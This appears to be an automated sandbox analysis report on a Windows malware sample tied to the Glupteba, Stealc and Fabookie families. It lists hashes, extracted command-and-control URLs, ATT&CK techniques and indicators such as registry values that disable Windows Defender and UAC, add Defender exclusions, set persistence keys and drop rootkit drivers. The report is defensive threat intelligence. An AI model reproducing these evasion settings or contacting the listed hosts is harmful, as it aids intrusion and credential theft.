fabookie | 8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5

Analysis

max time kernel
149s
max time network
152s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26-01-2024 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

23KB
MD5

13e50553cf74404e0667de093b05d4bb
SHA1

d2b4e780b13305b25cba7cd3b2259d94d84120a8
SHA256

8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5
SHA512

23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c
SSDEEP

384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM

Score

10^/10

fabookie glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Extracted

Family

fabookie

http://app.alie3ksgaa.com/check/safe

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/2684-409-0x00000000033C0000-0x00000000034EE000-memory.dmp	family_fabookie
behavioral1/memory/2684-487-0x00000000033C0000-0x00000000034EE000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 25 IoCs

resource	yara_rule
behavioral1/memory/2112-177-0x0000000004CC0000-0x00000000055AB000-memory.dmp	family_glupteba
behavioral1/memory/2112-178-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1980-179-0x0000000004C50000-0x000000000553B000-memory.dmp	family_glupteba
behavioral1/memory/1980-194-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2112-204-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1980-213-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2104-231-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1580-246-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2104-329-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1580-333-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/1580-395-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-400-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2104-401-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2104-440-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-465-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-479-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-483-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-491-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-493-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-522-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-531-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-549-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-558-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-575-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba
behavioral1/memory/2904-581-0x0000000000400000-0x0000000002EF4000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Windows security bypass 2 TTPs 50 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0"	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\KplGr0SP30DQu68lNKFMD8vo.exe = "0"	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\rwoUTES6KWqKUfnaE76S2egL.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0"	reg.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
2388	bcdedit.exe
1124	bcdedit.exe
2848	bcdedit.exe
3040	bcdedit.exe
1008	bcdedit.exe
2828	bcdedit.exe
1468	bcdedit.exe
2596	bcdedit.exe
1988	bcdedit.exe
2660	bcdedit.exe
2916	bcdedit.exe
1472	bcdedit.exe
1940	bcdedit.exe
2668	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
568	netsh.exe
2940	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\881M9Uki0jwzo5reYnTpDdfL.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G6vVf1cJKz8ihY7SoP3O4RV2.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QRAuLJyM37c8wVxjkNp1wJW2.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kOxzMD9NPdYN7L5dciOLcO6j.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oXCoE4eXOKvXJa2xXLepUyag.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4F667KpJBitvUWyyilFemNiN.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sSoZLQaBh7DnaKldY1BOdchr.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wu51jQmdQcpxDO9XjYssduRT.bat	CasPol.exe

Executes dropped EXE 20 IoCs

pid	Process
2112	reg.exe
1980	rwoUTES6KWqKUfnaE76S2egL.exe
2104	schtasks.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe
2308	DGnWrGgR0Ahw3F41JyJBFq1d.exe
2760	Tg5hdahXvKii7G3w0MBRwS98.exe
2664	BroomSetup.exe
2684	gbRaTzKO9iodoWeQTl3RFCKz.exe
664	Install.exe
2952	Install.exe
1872	nst98A9.tmp
1128	3MeQZSTnrtjerGqeUZehU4ni.exe
2904	csrss.exe
2428	patch.exe
1560	injector.exe
2560	dsefix.exe
2324	windefender.exe
1536	windefender.exe
1920	FJMmqgN.exe

Loads dropped DLL 41 IoCs

pid	Process
1568	CasPol.exe
1568	CasPol.exe
1568	CasPol.exe
1568	CasPol.exe
1568	CasPol.exe
1568	CasPol.exe
2308	DGnWrGgR0Ahw3F41JyJBFq1d.exe
1568	CasPol.exe
2760	Tg5hdahXvKii7G3w0MBRwS98.exe
2760	Tg5hdahXvKii7G3w0MBRwS98.exe
2760	Tg5hdahXvKii7G3w0MBRwS98.exe
2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe
2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe
1568	CasPol.exe
2760	Tg5hdahXvKii7G3w0MBRwS98.exe
664	Install.exe
664	Install.exe
664	Install.exe
2308	DGnWrGgR0Ahw3F41JyJBFq1d.exe
2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe
664	Install.exe
2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe
2860	SAE8T4zcskbBA8RYtX1Q0I9g.exe
2952	Install.exe
2952	Install.exe
2952	Install.exe
1568	CasPol.exe
1568	CasPol.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
1580	rwoUTES6KWqKUfnaE76S2egL.exe
844	Process not Found
2428	patch.exe
2428	patch.exe
2904	csrss.exe
2428	patch.exe
2428	patch.exe
2428	patch.exe
2428	patch.exe
2428	patch.exe
2428	patch.exe
2904	csrss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016591-228.dat	upx
behavioral1/files/0x0006000000016591-232.dat	upx
behavioral1/files/0x0006000000016591-230.dat	upx
behavioral1/memory/2308-247-0x0000000000290000-0x0000000000778000-memory.dmp	upx
behavioral1/memory/2308-463-0x0000000000290000-0x0000000000778000-memory.dmp	upx
behavioral1/memory/2324-529-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1536-543-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1536-576-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\rwoUTES6KWqKUfnaE76S2egL.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0"	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	rwoUTES6KWqKUfnaE76S2egL.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	rwoUTES6KWqKUfnaE76S2egL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	pastebin.com
12	pastebin.com

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FJMmqgN.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	FJMmqgN.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FJMmqgN.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2512 set thread context of 1568	2512	file.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	schtasks.exe
File opened (read-only)	\??\VBoxMiniRdrDN	rwoUTES6KWqKUfnaE76S2egL.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	rwoUTES6KWqKUfnaE76S2egL.exe
File created	C:\Windows\rss\csrss.exe	rwoUTES6KWqKUfnaE76S2egL.exe
File opened for modification	C:\Windows\rss	schtasks.exe
File created	C:\Windows\rss\csrss.exe	schtasks.exe
File created	C:\Windows\Tasks\bmfUAJAHieefCXsdaD.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240126190737.cab	makecab.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3016	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nst98A9.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	nst98A9.tmp

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2832	schtasks.exe
1076	schtasks.exe
1608	schtasks.exe
1788	schtasks.exe
2104	schtasks.exe
1916	schtasks.exe
840	schtasks.exe
2624	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	schtasks.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
